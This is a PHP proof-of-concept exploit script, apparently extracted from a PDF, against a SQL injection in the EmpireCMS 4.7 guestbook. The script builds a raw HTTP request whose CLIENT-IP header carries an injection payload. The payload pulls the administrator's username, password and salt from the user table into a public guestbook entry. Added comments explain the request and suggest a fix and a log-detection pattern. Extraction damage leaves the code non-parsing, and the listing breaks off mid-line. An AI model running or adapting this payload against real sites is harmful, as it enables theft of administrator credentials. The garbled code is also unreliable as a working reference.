1 <?php
// Proof-of-concept request generator for the EmpireCMS 4.7 guestbook SQL injection described
// in the banner below. The code is left verbatim; the notes are written for defenders (what the
// request looks like on the wire, where the payload sits, how to detect and fix the weakness).
//
// NOTE(review): this listing is a PDF extraction — the quotes appear as typographic ’ and the
// hyphens as U+2212 (e.g. "Content−Type"), so the text as reproduced here does not parse as PHP
// and the header names would not match a real parser; read it as documentation of the request.
2 print_r("
3
+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
4 Application Info:
5 Name: EmpireCMS47
6
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
7 Discoverd By: Securitylab.ir
8 Contacts: info@securitylab[dot]ir
9 Note: just work as php>=5&mysql>=4.1
10 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
11 Vulnerability Info:
12 Sql Injection
13 Medium Risk
14 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
15 ");
// Argument check: host and path are required; otherwise print usage and exit.
16 if ($argc<3) {
17 echo "Usage: php ".$argv[0]." host path \n";
18 echo "host: target server \n";
19 echo "path: path to EmpireCMS47\n";
20 echo "Example:\r\n";
21 echo "php ".$argv[0]." localhost /\n";
22 die;
23 }
24 $host=$argv[1];
25 $path=$argv[2];
// Form body for the guestbook "add" action (enews=AddGbook). The field values themselves are
// ordinary — the injection is NOT in the form body (see the CLIENT-IP header below).
26 $data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook";
// Injection payload: closes the quoted value the application inserts, appends a second VALUES
// tuple whose text field is a subselect of username/password/rnd from phome_enewsuser (userid=1,
// presumably the administrator), and ends with /* so the remainder of the original statement is
// treated as a comment. Credentials therefore surface as a guestbook entry.
27 $cmd = "aaaaaaaa’,0,1,’’),(’t00lsxxxx’,’t00lsxxxxx’,’’,’2008−05−28 15:44:17’,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where
28
userid=1),’’,1,’1111’,0,0,’’)/*";
// Hand-assembled HTTP/1.1 request to the enews front controller, sent over a plain socket.
29 $message = "POST ".$path."/e/enews/index.php"." HTTP/1.1\r\n";
// Referer and the ecmsgbookbid cookie (below) both name guestbook id 1 — presumably required
// by the handler to select the guestbook; TODO confirm against the application source.
30 $message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1\r\n";
31 $message .= "Accept−Language: zh−cn\r\n";
32 $message .= "Content−Type: application/x−www−form−urlencoded\r\n";
33 $message .= "User−Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
// The payload is carried in the CLIENT-IP request header: the target evidently takes the visitor's
// IP address from a client-supplied header and concatenates it into the INSERT unescaped.
// Defender notes — fix: use the socket peer address (or a proxy-set header only after
// filter_var($v, FILTER_VALIDATE_IP)) and bind all values with prepared statements;
// detection: flag CLIENT-IP / X-Forwarded-For values that are not a single IP literal
// (quotes, parentheses, "select", "/*") in web-server or WAF logs.
34 $message .= "CLIENT−IP: $cmd\r\n";
35 $message .= "Host: $host\r\n";
36 $message .= "Content−Length: ".strlen($data)."\r\n";
37 $message .= "Cookie: ecmsgbookbid=1;\r\n";
// Connection: Close is what lets the feof() loop below terminate once the server finishes.
38 $message .= "Connection: Close\r\n";
39 $message .= "\r\n";
40 $message .=$data;
// Plain-text HTTP on port 80; fsockopen's optional timeout argument is not passed, so the
// connect uses the default_socket_timeout ini value.
41 $ock=fsockopen($host,80);
42 if (!$ock) {
43 echo ’No response from ’.$host;
44 die;
45 }
46 echo "[+]connected to the site!\r\n";
// The garbled characters in this string are a PDF encoding artefact (likely an ellipsis).
47 echo "[+]sending data nowâM−^@¦âM−^@¦\r\n";
48 fputs($ock,$message);
// The @ here suppresses nothing useful — a plain assignment does not emit warnings.
49 @$resp =’’;
// Brace-less while: only the fread() line is the loop body. Reads the whole response until EOF.
50 while ($ock && !feof($ock))
51 $resp .= fread($ock, 1024);
52 echo $resp;
53 echo "[+]done!\r\n";
54 echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see t